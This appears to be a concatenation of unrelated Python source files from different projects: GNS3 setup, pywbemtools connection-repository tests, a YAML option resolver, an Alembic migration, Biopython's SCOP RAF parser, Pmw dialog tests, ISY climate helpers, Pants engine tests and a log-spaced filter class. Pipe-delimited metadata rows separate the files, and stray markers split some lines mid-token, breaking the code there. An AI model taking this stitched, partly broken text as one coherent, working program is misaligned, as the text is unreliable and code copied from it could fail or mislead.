'GNS3.Ui.ConfigurationPages.Page_ATMBR',
'GNS3.Ui.ConfigurationPages.Page_Cloud',
'GNS3.Ui.ConfigurationPages.Page_ETHSW',
'GNS3.Ui.ConfigurationPages.Page_Hub',
'GNS3.Ui.ConfigurationPages.Page_FRSW',
'GNS3.Ui.ConfigurationPages.Page_IOSRouter',
'GNS3.Ui.ConfigurationPages.Page_PIX',
'GNS3.Ui.ConfigurationPages.Page_ASA',
'GNS3.Ui.ConfigurationPages.Page_AWP',
'GNS3.Ui.ConfigurationPages.Page_JunOS',
'GNS3.Ui.ConfigurationPages.Page_IDS',
'GNS3.Ui.ConfigurationPages.Page_Qemu',
'GNS3.Ui.ConfigurationPages.Page_VirtualBox',
'GNS3.Ui.ConfigurationPages.Page_DecorativeNode',
'GNS3.Ui.ConfigurationPages.Page_PreferencesDynamips',
'GNS3.Ui.ConfigurationPages.Page_PreferencesGeneral',
'GNS3.Ui.ConfigurationPages.Page_PreferencesCapture',
'GNS3.Ui.ConfigurationPages.Page_PreferencesQemu',
'GNS3.Ui.ConfigurationPages.Page_PreferencesVirtualBox',
'GNS3.Ui.ConfigurationPages.Page_PreferencesDeployementWizard',
],
'plist' : { 'CFBundleName': 'GNS3',
'CFBundleDisplayName': 'GNS3',
'CFBundleGetInfoString' : 'GNS3, Graphical Network Sim |
pywbem/pywbemtools | tests/unit/pywbemcli/test_connection_repository.py | Python | apache-2.0 | 32,125 | 0.000062 | # -*- coding: utf-8 -*-
# (C) Copyright 2020 IBM Corp.
# (C) Copyright 2020 Inova Development Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit test of connection repository class. Tests the capability to create and
modify good repositories and to catch load errors for repositories that have
errors in the data.
"""
from __future__ import absolute_import, print_function
import sys
import os
import io
from contextlib import contextmanager
from mock import patch
import pytest
import pywbemtools.pywbemcli._connection_repository
from pywbemtools.pywbemcli._connection_repository import ConnectionRepository, \
ConnectionsFileLoadError, ConnectionsFileWriteError
from pywbemtools._utils import B08_DEFAULT_CONNECTIONS_FILE, \
DEFAULT_CONNECTIONS_FILE
from pywbemtools.pywbemcli._pywbem_server import PywbemServer
from ..pytest_extensions import simplified_test_function
# Click (as of 7.1.2) raises UnsupportedOperation in click.echo() when
# the pytest capsys fixture is used. That happens only on Windows.
# See Click issue https://github.com/pallets/click/issues/1590. This
# run condition skips the testcases on Windows.
CLICK_ISSUE_1590 = sys.platform == 'win32'
SCRIPT_DIR = os.path.dirname(__file__)
CONNECTION_REPO_TEST_FILE_PATH = os.path.join(SCRIPT_DIR,
'tst_connection_repository.yaml')
YAML_GOOD_TWO_DEFS = u"""connection_definitions:
tst1:
name: tst1
server: http://blah
user: fred
password: fred
default-namespace: root/cimv2
timeout: 30
use_pull: null
pull_max_cnt: null
verify: true
certfile: null
keyfile: null
ca-certs: null
mock-server: []
tst2:
name: tst2
server: http://blah
user: null
password: null
default-namespace: root/cimv2
timeout: 30
use_pull: true
pull_max_cnt: 98
verify: true
certfile: null
keyfile: null
ca-certs: null
mock-server: []
default_connection_name: null
"""
YAML_GOOD_NO_DEF = u"""connection_definitions: {}
default_connection_name: null
"""
YAML_MISSING_DEFAULT = u"""connection_definitions:
tst1:
name: tst1
server: http://blah
user: fred
password: fred
default-namespace: root/cimv2
timeout: 30
use_pull: null
pull_max_cnt: null
verify: true
certfile: null
keyfile: null
ca-certs: null
mock-server: []
"""
YAML_MISSING_CONNDEFS = u"""tst1:
name: tst1
server: http://blah
user: fred
password: fred
default-namespace: root/cimv2
timeout: 30
use_pull: null
pull_max_cnt: null
verify: true
certfile: null
keyfile: null
ca-certs: null
mock-server: []
default_connection_name: null
"""
YAML_INVALID_ATTR_NAME = u"""connection_definitions:
tst1:
name: tst1
server: http://blah
user: fred
password: fred
default-namespace: root/cimv2
timeoutx: 30
use_pull: null
pull_max_cnt: null
verify: true
certfile: null
keyfile: null
ca-certs: null
mock-server: []
default_connection_name: null
"""
YAML_INVALID_SYNTAX = u"""connection_definitions:
*+&%:
default_connection_name: null
"""
YAML_INVALID_MOCKSERVER_TYPE = u"""connection_definitions:
tst1:
name: tst1
mock-server: 42
default_connection_name: null
"""
YAML_INVALID_TIMEOUT_VALUE = u"""connection_definitions:
tst1:
name: tst1
server: http://blah
timeout: -100
default_connection_name: null
"""
YAML_SERVER_AND_MOCKSERVER = u"""connection_definitions:
tst1:
name: tst1
server: http://blah
mock-server: 'blah'
default_connection_name: null
"""
OK = True # mark tests OK when they execute correctly
RUN = True # Mark OK = False and current test case being created RUN
FAIL = False # Any test currently FAILING or not tested yet
def _remove_test_files():
    """Remove the test connections file and its .bak/.tmp companions,
    if present."""
    for suffix in ('', '.bak', '.tmp'):
        path = CONNECTION_REPO_TEST_FILE_PATH + suffix
        if os.path.isfile(path):
            os.remove(path)


@pytest.fixture()
def remove_file_before_after():
    """
    Remove the connections file (and its .bak/.tmp companions) at the
    beginning and end of the test.
    """
    _remove_test_files()
    # The yield causes the remainder of this fixture to be executed at the
    # end of the test.
    yield
    _remove_test_files()
# The real functions before they get patched
REAL_OS_RENAME = os.rename
REAL_OS_RENAME_STR = 'os.rename'
# pylint: disable=protected-access
REAL_OPEN_TEXT_FILE = \
pywbemtools.pywbemcli._connection_repository.open_text_file
REAL_OPEN_TEXT_FILE_STR = \
'pywbemtools.pywbemcli._connection_repository.open_text_file'
def rename_to_bak_fails(file1, file2):
    """
    Stand-in for os.rename() that raises OSError whenever the rename
    target ends with '.bak'; any other rename is delegated to the real
    os.rename().
    """
    if not file2.endswith('.bak'):
        REAL_OS_RENAME(file1, file2)
        return
    raise OSError("Mocked failure: Cannot rename {} to {}".
                  format(file1, file2))
def rename_from_tmp_fails(file1, file2):
    """
    Stand-in for os.rename() that raises OSError whenever the rename
    source ends with '.tmp'; any other rename is delegated to the real
    os.rename().
    """
    if not file1.endswith('.tmp'):
        REAL_OS_RENAME(file1, file2)
        return
    raise OSError("Mocked failure: Cannot rename {} to {}".
                  format(file1, file2))
def rename_fails(file1, file2):
    """Stand-in for os.rename() that unconditionally raises OSError."""
    message = "Mocked failure: Cannot rename {} to {}".format(file1, file2)
    raise OSError(message)
@contextmanager
def open_text_file_write_fails(filename, file_mode):
    """
    Patch function replacing open_text_file() that raises
    OSError when the file is opened in write mode.
    """
    # Fail for any mode containing 'w' ('w', 'wb', 'w+', ...).
    if 'w' in file_mode:
        raise OSError("Mocked failure: Cannot open {} in mode {}".
                      format(filename, file_mode))
    # Delegate the context manager yield to REAL_OPEN_TEXT_FILE()
    # NOTE(review): returning REAL_OPEN_TEXT_FILE's result from a
    # @contextmanager-decorated function hands a non-generator to
    # contextlib -- confirm the non-failing path is actually exercised
    # and behaves as intended (the usual pattern would be
    # `with REAL_OPEN_TEXT_FILE(...) as f: yield f`).
    return REAL_OPEN_TEXT_FILE(filename, file_mode)
@contextmanager
def open_text_file_read_fails(filename, file_mode):
    """
    Patch function replacing open_text_file() that raises
    OSError when the file is opened in read mode.
    """
    # Fail for any mode containing 'r' ('r', 'rb', 'r+', ...).
    if 'r' in file_mode:
        raise OSError("Mocked failure: Cannot open {} in mode {}".
                      format(filename, file_mode))
    # Delegate the context manager yield to REAL_OPEN_TEXT_FILE()
    # NOTE(review): returning REAL_OPEN_TEXT_FILE's result from a
    # @contextmanager-decorated function hands a non-generator to
    # contextlib -- confirm the non-failing path is actually exercised
    # and behaves as intended.
    return REAL_OPEN_TEXT_FILE(filename, file_mode)
# Testcases for create ConnectionRepository
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * file: test file path. File to test built into this file path
# * svrs: Zero or more instances of PywbemServer class
# * default: value to set as default server
# * exp_rtn: Expected return value of _format_instances_as_rows().
# * keys: keys expected in file
# * default: Value for default server |
hcpss-banderson/py-tasc | optionresolver.py | Python | mit | 1,993 | 0.018565 | import optparse, yaml, json
class OptionResolver(object):
    """Resolve user-supplied command line options.

    Wraps an optparse.OptionParser and exposes accessors for the manifest
    location and its parsed contents, the assembly destination, and any
    JSON-encoded extra parameters.
    (Fixed: two lines had been corrupted mid-token in the original text.)
    """

    def __init__(self):
        self.parser = optparse.OptionParser()
        self.set_options()

    def set_options(self):
        """Declare the supported command line options on the parser."""
        self.parser.add_option(
            "--manifest", "-m",
            help = "The location of the manifest file.",
            default = "./manifest.yml")
        self.parser.add_option(
            "--destination", "-d",
            help = "Where to assemble the code.",
            default = ".")
        self.parser.add_option(
            "--extra-parameters", "-e",
            help = "A JSON encoded string with extra parameters.")

    def parse(self):
        """Return the raw parsed user supplied values

        :rtype: optparse.Values
        """
        return self.parser.parse_args()[0]

    def manifest_location(self):
        """Return the location of the manifest file

        :rtype: str
        """
        return self.parse().manifest

    def manifest(self):
        """Get the parsed values from the manifest

        :rtype: dict[str, mixed]
        """
        with open(self.manifest_location(), "r") as stream:
            yamlstring = stream.read()

        # Allow token replacements: {name} placeholders in the manifest
        # are substituted from the extra parameters before YAML parsing.
        params = self.extra_parameters()
        if params:
            yamlstring = yamlstring.format(**params)

        # NOTE(review): yaml.load() without an explicit Loader can execute
        # arbitrary constructors; prefer yaml.safe_load() if the manifest
        # may come from an untrusted source.
        return yaml.load(yamlstring)

    def destination(self):
        """Get the assembly location

        :rtype: str
        """
        return self.parse().destination

    def extra_parameters(self):
        """Get extra parameters, or None when the option was not given.

        :rtype: dict[str, str] or None
        """
        params_string = self.parse().extra_parameters
        if params_string:
            return json.loads(self.parse().extra_parameters)
|
pythonvietnam/pbc082015 | vumanhcuong/Day3/khonghieu.py | Python | gpl-2.0 | 204 | 0.019608 | #Ba | i tap ve nha | ngay 3 (20150827)
# Homework, day 3 (2015-08-27).
# Reads a string from the user and reports how many times each of the
# letters 'a', 'b' and 'c' occurs in it.  (Prompts/output are Vietnamese;
# "Nhap vao 1 chuoi so" ~ "enter a string", "So ki tu X la" ~
# "number of 'X' characters is".)  Python 2 source (print statement,
# raw_input).
a = raw_input ("Nhap vao 1 chuoi so:")
#print "So nay:", a
print "So ki tu a la:", a.count("a")
print "So ki tu b la:", a.count("b")
print "So ki tu c la:", a.count("c")
ergo/ziggurat_foundations | ziggurat_foundations/migrations/versions/46a9c4fb9560_pass_col_sizes.py | Python | bsd-3-clause | 594 | 0.003367 | " | ""make password hash field bigger
Revision ID: 46a9c4fb9560
Revises: 5c84d7260c5
Create Date: 2011-12-20 17:59:16.961112
"""
from __future__ import unicode_literals
import sqlalchemy as sa
from alembic import op
# downgrade revision identifier, used by Alembic.
revision = "46a9c4fb9560"
down_revision = "5c84d7260c5"
def upgrade():
    """Widen users.user_password and users.security_code from Unicode(40)
    to Unicode(256) to accommodate longer password hashes.

    (Fixed: the second alter_column call had been corrupted by a stray
    separator in the original text.)
    """
    op.alter_column(
        "users", "user_password", type_=sa.Unicode(256), existing_type=sa.Unicode(40)
    )
    op.alter_column(
        "users", "security_code", type_=sa.Unicode(256), existing_type=sa.Unicode(40)
    )
def downgrade():
    # Intentionally a no-op: presumably because shrinking the columns back
    # to Unicode(40) could truncate stored data -- confirm before relying
    # on this migration being reversible.
    pass
|
BlogomaticProject/Blogomatic | opt/blog-o-matic/usr/lib/python/Bio/SCOP/Raf.py | Python | gpl-2.0 | 12,101 | 0.019337 | # Copyright 2001 by Gavin E. Crooks. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
# Gavin E. Crooks 2001-10-10
"""ASTRAL RAF (Rapid Access Format) Sequence Maps.
The ASTRAL RAF Sequence Maps record the relationship between the PDB SEQRES
records (representing the sequence of the molecule used in an experiment) to
the ATOM records (representing the atoms experimentally observed).
This data is derived from the Protein Data Bank CIF files. Known errors in the
CIF files are corrected manually, with the original PDB file serving as the
final arbiter in case of discrepancies.
Residues are referenced by residue ID. This consists of a the PDB residue
sequence number (upto 4 digits) and an optional PDB insertion code (an
ascii alphabetic character, a-z, A-Z). e.g. "1", "10A", "1010b", "-1"
See "ASTRAL RAF Sequence Maps":http://astral.stanford.edu/raf.html
to_one_letter_code -- A mapping from the 3-letter amino acid codes found
in PDB files to 1-letter codes. The 3-letter codes
include chemically modified residues.
"""
from copy import copy
from Bio.SCOP.Residues import Residues
# This table is taken from the RAF release notes, and includes the
# undocumented mapping "UNK" -> "X".
# Fixed: two rows ('EFC' and 'MLE') had been corrupted by stray separators
# in the original text.
to_one_letter_code= {
    'ALA':'A', 'VAL':'V', 'PHE':'F', 'PRO':'P', 'MET':'M',
    'ILE':'I', 'LEU':'L', 'ASP':'D', 'GLU':'E', 'LYS':'K',
    'ARG':'R', 'SER':'S', 'THR':'T', 'TYR':'Y', 'HIS':'H',
    'CYS':'C', 'ASN':'N', 'GLN':'Q', 'TRP':'W', 'GLY':'G',
    '2AS':'D', '3AH':'H', '5HP':'E', 'ACL':'R', 'AIB':'A',
    'ALM':'A', 'ALO':'T', 'ALY':'K', 'ARM':'R', 'ASA':'D',
    'ASB':'D', 'ASK':'D', 'ASL':'D', 'ASQ':'D', 'AYA':'A',
    'BCS':'C', 'BHD':'D', 'BMT':'T', 'BNN':'A', 'BUC':'C',
    'BUG':'L', 'C5C':'C', 'C6C':'C', 'CCS':'C', 'CEA':'C',
    'CHG':'A', 'CLE':'L', 'CME':'C', 'CSD':'A', 'CSO':'C',
    'CSP':'C', 'CSS':'C', 'CSW':'C', 'CXM':'M', 'CY1':'C',
    'CY3':'C', 'CYG':'C', 'CYM':'C', 'CYQ':'C', 'DAH':'F',
    'DAL':'A', 'DAR':'R', 'DAS':'D', 'DCY':'C', 'DGL':'E',
    'DGN':'Q', 'DHA':'A', 'DHI':'H', 'DIL':'I', 'DIV':'V',
    'DLE':'L', 'DLY':'K', 'DNP':'A', 'DPN':'F', 'DPR':'P',
    'DSN':'S', 'DSP':'D', 'DTH':'T', 'DTR':'W', 'DTY':'Y',
    'DVA':'V', 'EFC':'C', 'FLA':'A', 'FME':'M', 'GGL':'E',
    'GLZ':'G', 'GMA':'E', 'GSC':'G', 'HAC':'A', 'HAR':'R',
    'HIC':'H', 'HIP':'H', 'HMR':'R', 'HPQ':'F', 'HTR':'W',
    'HYP':'P', 'IIL':'I', 'IYR':'Y', 'KCX':'K', 'LLP':'K',
    'LLY':'K', 'LTR':'W', 'LYM':'K', 'LYZ':'K', 'MAA':'A',
    'MEN':'N', 'MHS':'H', 'MIS':'S', 'MLE':'L', 'MPQ':'G',
    'MSA':'G', 'MSE':'M', 'MVA':'V', 'NEM':'H', 'NEP':'H',
    'NLE':'L', 'NLN':'L', 'NLP':'L', 'NMC':'G', 'OAS':'S',
    'OCS':'C', 'OMT':'M', 'PAQ':'Y', 'PCA':'E', 'PEC':'C',
    'PHI':'F', 'PHL':'F', 'PR3':'C', 'PRR':'A', 'PTR':'Y',
    'SAC':'S', 'SAR':'G', 'SCH':'C', 'SCS':'C', 'SCY':'C',
    'SEL':'S', 'SEP':'S', 'SET':'S', 'SHC':'C', 'SHR':'K',
    'SOC':'C', 'STY':'Y', 'SVA':'S', 'TIH':'A', 'TPL':'W',
    'TPO':'T', 'TPQ':'A', 'TRG':'K', 'TRO':'W', 'TYB':'Y',
    'TYQ':'Y', 'TYS':'Y', 'TYY':'Y', 'AGM':'R', 'GL3':'G',
    'SMC':'C', 'ASX':'B', 'CGU':'E', 'CSX':'C', 'GLX':'Z',
    'PYX':'C',
    'UNK':'X'
    }
def normalize_letters(one_letter_code):
    """Convert RAF one-letter amino acid codes into IUPAC standard codes.

    Letters are uppercased, and "." ("Unknown") is converted to "X".
    """
    return 'X' if one_letter_code == '.' else one_letter_code.upper()
class SeqMapIndex(dict):
    """An RAF file index.

    The RAF file itself is about 50 MB. This index provides rapid, random
    access of RAF records without having to load the entire file into memory.

    The index key is a concatenation of the PDB ID and chain ID. e.g
    "2drcA", "155c_". RAF uses an underscore to indicate blank
    chain IDs.
    """
    def __init__(self, filename):
        """
        Arguments:
        filename -- The file to index
        """
        dict.__init__(self)
        self.filename = filename
        # Scan the file once, recording the byte offset of each record,
        # keyed by the record's first five characters (pdbid + chainid).
        f = open(self.filename, "rU")
        try:
            position = 0
            while True:
                line = f.readline()
                if not line: break
                key = line[0:5]
                # NOTE(review): `key` is a string slice and can never be
                # None, so this test is always true -- presumably it was
                # meant to guard against short/blank lines; confirm intent.
                if key != None:
                    self[key]=position
                position = f.tell()
        finally:
            f.close()

    def __getitem__(self, key):
        """ Return an item from the indexed file. """
        # Look up the stored byte offset, then parse just that one line
        # into a SeqMap on demand.
        position = dict.__getitem__(self,key)
        f = open(self.filename, "rU")
        try:
            f.seek(position)
            line = f.readline()
            record = SeqMap(line)
        finally:
            f.close()
        return record

    def getSeqMap(self, residues):
        """Get the sequence map for a collection of residues.

        residues -- A Residues instance, or a string that can be converted into
                    a Residues instance.
        """
        if isinstance(residues, basestring):
            residues = Residues(residues)

        pdbid = residues.pdbid
        frags = residues.fragments
        if not frags: frags =(('_','',''),) # All residues of unnamed chain

        # Fetch each fragment's chain record, trim it to the requested
        # residue range, and concatenate the pieces in order.
        seqMap = None
        for frag in frags:
            chainid = frag[0]
            # Normalize the various "blank chain" spellings to '_',
            # matching the index-key convention.
            if chainid=='' or chainid=='-' or chainid==' ' or chainid=='_':
                chainid = '_'
            id = pdbid + chainid

            sm = self[id]

            #Cut out fragment of interest
            start = 0
            end = len(sm.res)
            if frag[1] : start = int(sm.index(frag[1], chainid))
            if frag[2] : end = int(sm.index(frag[2], chainid)+1)

            sm = sm[start:end]
            if seqMap == None:
                seqMap = sm
            else:
                seqMap += sm

        return seqMap
class SeqMap(object):
"""An ASTRAL RAF (Rapid Access Format) Sequence Map.
This is a list like object; You can find the location of particular residues
with index(), slice this SeqMap into fragments, and glue fragments back
together with extend().
pdbid -- The PDB 4 character ID
pdb_datestamp -- From the PDB file
version -- The RAF format version. e.g. 0.01
flags -- RAF flags. (See release notes for more information.)
res -- A list of Res objects, one for each residue in this sequence map
"""
    def __init__(self, line=None):
        """Create an empty SeqMap, optionally parsing a RAF record line.

        line -- a single RAF record; when given, it is parsed immediately
                via _process().
        """
        self.pdbid = ''           # PDB 4 character ID
        self.pdb_datestamp = ''   # datestamp taken from the PDB file
        self.version = ''         # RAF format version, e.g. "0.01"
        self.flags = ''           # RAF flags (see release notes)
        self.res = []             # one Res object per residue
        if line:
            self._process(line)
    def _process(self, line):
        """Parses a RAF record into a SeqMap object.

        The record is fixed-width: a 38-character header followed by
        7-character residue fields. Raises ValueError on a short header,
        an unsupported format version, or a truncated residue field.
        """
        header_len = 38
        line = line.rstrip() # no trailing whitespace
        if len(line)<header_len:
            raise ValueError("Incomplete header: "+line)

        # Header layout (character offsets): pdbid [0:4], chainid [4:5],
        # version [6:10], datestamp [14:20], flags [21:27].
        self.pdbid = line[0:4]
        chainid = line[4:5]

        self.version = line[6:10]

        #Raf format versions 0.01 and 0.02 are identical for practical purposes
        if(self.version != "0.01" and self.version !="0.02"):
            raise ValueError("Incompatible RAF version: "+self.version)

        self.pdb_datestamp = line[14:20]
        self.flags = line[21:27]

        # Each residue field: resid [0:5], ATOM-record code [5:6],
        # SEQRES code [6:7]; codes are normalized to IUPAC one-letter form.
        for i in range(header_len, len(line), 7):
            f = line[i : i+7]
            if len(f)!=7:
                raise ValueError("Corrupt Field: ("+f+")")
            r = Res()
            r.chainid = chainid
            r.resid = f[0:5].strip()
            r.atom = normalize_letters(f[5:6])
            r.seqres = normalize_letters(f[6:7])

            self.res.append(r)
    def index(self, resid, chainid="_"):
        """Return the position in self.res of the residue with the given
        residue ID and chain ID; raise KeyError when it is not present."""
        for i in range(0, len(self.res)):
            if self.res[i].resid == resid and self.res[i].chainid == chainid:
                return i
        raise KeyError("No such residue "+chainid+resid)
def __getitem__(self, index):
if |
mhcrnl/PmwTkEx | src/Pmw/Pmw_1_3/tests/CounterDialog_test.py | Python | apache-2.0 | 2,577 | 0.001552 | import Tkinter
import Test
import Pmw
Test.initialise()
c = Pmw.CounterDialog
kw_1 = {
'counter_labelpos': 'n',
'counter_buttonaspect': 2.0,
'counter_autorepeat': 0,
'counter_initwait': 1000,
'counter_padx': 5,
'counter_pady': 5,
'counter_repeatrate': 20,
'label_text' : 'Counter:',
'buttons' : ('OK', 'Cancel', 'Help'),
}
# Test data: each entry is either an (option, value[, expected]) tuple or a
# (method, args[, expected]) tuple, executed by Test.runTests below.
# Fixed: two entries ('entry_insertborderwidth' 0 and 'entry_show') had been
# corrupted by stray separators in the original text.
tests_1 = (
  (Test.num_options, (), 11),
  ('counter_Arrow_borderwidth', 10),
  ('counter_hull_background', 'yellow'),
  ('command', Test.callback1),
  ('hull_cursor', 'gumby'),
  ('counter_datatype', 'time'),
  ('counter_datatype', 'numeric'),
  ('entry_borderwidth', 6),
  ('entry_relief', 'raised'),
  ('entry_exportselection', 0),
  ('entry_foreground', 'blue'),
  ('hull_highlightcolor', 'Red'),
  ('hull_highlightthickness', 2),
  ('counter_increment', 1),
  ('entry_insertbackground', 'Yellow'),
  ('entry_insertbackground', 'Black'),
  ('entry_insertborderwidth', 1),
  ('entry_insertborderwidth', 0),
  ('entry_insertofftime', 400),
  ('entry_insertontime', 700),
  ('entry_insertwidth', 3),
  ('entryfield_invalidcommand', Test.callback),
  ('entry_show', '*'),
  ('entry_background', 'red'),
  (c.setentry, '69', 1),
  ('entry_justify', 'right'),
  ('entry_justify', 'center'),
  ('entry_justify', 'left'),
  ('label_text', 'Label'),
  ('entry_relief', 'raised'),
  ('entry_relief', 'sunken'),
  ('entry_state', 'disabled'),
  ('entry_state', 'normal'),
  ('entry_background', 'GhostWhite'),
  ('entryfield_validate', 'numeric'),
  ('entryfield_validate', 'alphabetic'),
  ('entry_width', 30),
  ('relief', 'bogus', 'KeyError: Unknown option "relief" for CounterDialog'),
  (c.interior, (), Tkinter.Frame),
  (c.insert, ('end', 69)),
  (c.increment, ()),
  (c.decrement, ()),
  ('defaultbutton', 1),
  (c.invoke, (), 'Cancel'),
  (c.clear, ()),
  (c.get, (), ''),
  (c.insert, ('end', 'Test String')),
  (c.get, (), 'Test String'),
  (c.delete, (0, 'end')),
  (c.insert, ('end', 'Another Test')),
  (c.icursor, 'end'),
  (c.index, 'end', 12),
  (c.selection_from, 0),
  (c.selection_to, 'end'),
  (c.xview, '3'),
  (c.clear, ()),
)
kw_2 = {
'buttonboxpos': 'e',
'counter_labelpos': 'w',
'label_text' : 'Another counter',
'buttonbox_pady': 25,
'buttons' : ('OK', 'Cancel'),
}
tests_2 = (
(c.title, 'CounterDialog 2', ''),
)
alltests = (
(tests_1, kw_1),
(tests_2, kw_2),
)
testData = ((c, alltests),)
if __name__ == '__main__':
Test.runTests(testData)
|
fxstein/ISYlib-python | ISY/_isyclimate.py | Python | bsd-2-clause | 1,533 | 0.001305 | """
This is a subfile for IsyClass.py
These funtions are accessable via the Isy class opj
"""
__author__ = 'Peter Shipley <peter.shipley@gmail.com>'
__copyright__ = "Copyright (C) 2013 Peter Shipley"
__license__ = "BSD"
import time
##
## Climate funtions
##
def load_clim(self):
    """Fetch climate data from the ISY device and cache it.

    Rebuilds ``self.climateinfo`` from the /rest/climate endpoint,
    flattening both XML attributes and child-element values of every
    ``climate`` node into one dict, and stamping a "time" entry with the
    moment the data was loaded.  Internal helper; returns None.
    """
    if self.debug & 0x01:
        print("load_clim")

    tree = self._getXMLetree("/rest/climate")
    self.climateinfo = {}
    if tree is None:
        return
    # Isy._printXML(self.climateinfo)
    for climate_node in tree.iter("climate"):
        # Attributes first, then child elements, into the same flat dict.
        self.climateinfo.update(climate_node.items())
        for child in list(climate_node):
            self.climateinfo[child.tag] = child.text
    self.climateinfo["time"] = time.gmtime()
def clim_get_val(self, prop):
    """Return the value of a single climate property.

    NOTE(review): unimplemented stub — currently always returns None.
    """
    pass
def clim_query(self):
    """Return the climate-info dictionary, loading it from the device on
    first use.

    TODO (carried over from the original author): honour ``self.cachetime``
    so stale data is refreshed rather than served forever.
    """
    if not self.climateinfo:
        self.load_clim()
    return self.climateinfo
def clim_iter(self):
    """Iterate over the cached climate values.

    Loads the climate data from the device on first use.

    Yields:
        Each value stored in ``self.climateinfo``.
    """
    if not self.climateinfo:
        self.load_clim()
    # Iterate the values directly instead of re-indexing the dict by its
    # own keys (the original fetched keys() and looked each one up again).
    for value in self.climateinfo.values():
        yield value
# Self-test: when executed directly this module only verifies that it parses.
if __name__ == "__main__":
    import __main__  # introspect our own module object to report its path
    print(__main__.__file__)
    print("syntax ok")
    exit(0)
|
square/pants | tests/python/pants_test/engine/test_engine.py | Python | apache-2.0 | 2,994 | 0.007348 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
from pants.base.exceptions import TaskError
from pants.engine.engine import Engine
from pants_test.base.context_utils import create_context
from pants_test.engine.base_engine_test import EngineTestBase
# TODO(John Sirois): Kill this test - the core Engine should unlearn dependencies ordering
# and leave this to subclasses that can form a strategy for this like RoundEngine.
class ExecutionOrderTest(EngineTestBase):
    """Checks that Engine.execution_order orders goals by dependency,
    honouring the order in which the goals were requested."""

    def test_execution_order(self):
        # Task graph: clean-all -> invalidate, compile -> resolve,
        # test -> compile (compile has two member tasks).
        self.install_task('invalidate')
        self.install_task('clean-all', dependencies=['invalidate'])
        self.install_task('resolve')
        self.install_task('javac', dependencies=['resolve'], goal='compile')
        self.install_task('scalac', dependencies=['resolve'], goal='compile')
        self.install_task('junit', dependencies=['compile'], goal='test')

        def ordered(*goal_names):
            return list(Engine.execution_order(self.as_goals(*goal_names)))

        # The requested order decides which dependency chain is scheduled first.
        self.assertEqual(self.as_goals('invalidate', 'clean-all', 'resolve', 'compile', 'test'),
                         ordered('clean-all', 'test'))
        self.assertEqual(self.as_goals('resolve', 'compile', 'test', 'invalidate', 'clean-all'),
                         ordered('test', 'clean-all'))
class EngineTest(EngineTestBase):
    """Exercises Engine.execute exit codes via a recording stub engine."""

    class RecordingEngine(Engine):
        """Engine stub that records every attempt and can trigger a failure."""

        def __init__(self, action=None):
            super(EngineTest.RecordingEngine, self).__init__()
            self._action = action
            self._attempts = []

        @property
        def attempts(self):
            return self._attempts

        def attempt(self, context, goals):
            self._attempts.append((context, goals))
            if self._action:
                self._action()

    def setUp(self):
        self.context = create_context()

    def assert_attempt(self, engine, *goal_names):
        # Exactly one attempt, made with our context and the expected goals.
        self.assertEqual(1, len(engine.attempts))
        attempted_context, attempted_goals = engine.attempts[0]
        self.assertEqual(self.context, attempted_context)
        self.assertEqual(self.as_goals(*goal_names), attempted_goals)

    def _throw(self, error):
        # Returns a zero-arg callable raising `error`, usable as an engine action.
        def throw():
            raise error
        return throw

    def test_execute_success(self):
        engine = self.RecordingEngine()
        self.assertEqual(0, engine.execute(self.context, self.as_goals('one', 'two')))
        self.assert_attempt(engine, 'one', 'two')

    def test_execute_raise(self):
        # A plain TaskError maps to the generic failure exit code 1.
        engine = self.RecordingEngine(action=self._throw(TaskError()))
        self.assertEqual(1, engine.execute(self.context, self.as_goals('three')))
        self.assert_attempt(engine, 'three')

    def test_execute_code(self):
        # A TaskError carrying an explicit exit code is propagated verbatim.
        engine = self.RecordingEngine(action=self._throw(TaskError(exit_code=42)))
        self.assertEqual(42, engine.execute(self.context, self.as_goals('four', 'five', 'six')))
        self.assert_attempt(engine, 'four', 'five', 'six')
|
awakenting/gif_fitting | fitgif/Filter_Rect_LogSpaced.py | Python | gpl-3.0 | 7,817 | 0.024562 | import numpy as np
from scipy.signal import fftconvolve
from . import Tools
from .Filter import Filter
class Filter_Rect_LogSpaced(Filter):
    """Filter expanded on a log-spaced rectangular basis.

    A function of time is represented as f(t) = sum_j b_j * rect_j(t),
    where the b_j are coefficients and the rect_j are rectangular basis
    functions whose widths grow exponentially with j (log spacing).

    This class is used to define both the spike-triggered current eta(t)
    and the spike-triggered movement of the firing threshold gamma(t).
    """

    def __init__(self, length=1000.0, binsize_lb=2.0, binsize_ub=1000.0, slope=7.0):
        Filter.__init__(self)

        # Metaparameters defining the basis.
        self.p_length = length          # ms, total filter length
        self.p_binsize_lb = binsize_lb  # ms, smallest allowed bin size
        self.p_binsize_ub = binsize_ub  # ms, largest allowed bin size
        self.p_slope = slope            # exponent controlling log-scale growth

        # Derived quantities, recomputed from the metaparameters.
        self.bins = []       # ms, edges of the rectangular basis functions
        self.support = []    # ms, centers of the bins
        self.bins_l = 0      # number of bins

        self.computeBins()
        self.setFilter_toZero()

    #############################################################################
    # Set functions
    #############################################################################

    def setFilter_Function(self, f):
        """Initialize the coefficients by sampling the function f(t) at the
        bin centers, so the filter approximates f with rectangles."""
        self.computeBins()
        self.filter_coeff = f(self.support)

    def setFilter_Coefficients(self, coeff):
        """Set the coefficients (the heights of the rectangular basis
        functions); `coeff` must have one entry per bin."""
        self.computeBins()
        if len(coeff) == self.bins_l:
            self.filter_coeff = coeff
        else:
            print ("Error, the number of coefficients do not match the number of basis functions!")

    def setFilter_toZero(self):
        """Reset every coefficient to zero."""
        self.computeBins()
        self.filter_coeff = np.zeros(self.bins_l)

    #############################################################################
    # Get functions
    #############################################################################

    def getInterpolatedFilter(self, dt):
        """Return (t, f(t)) sampled on a regular grid of resolution dt."""
        self.computeBins()
        edge_idx = Tools.timeToIndex(self.bins, dt)
        if self.getNbOfBasisFunctions() == len(self.filter_coeff):
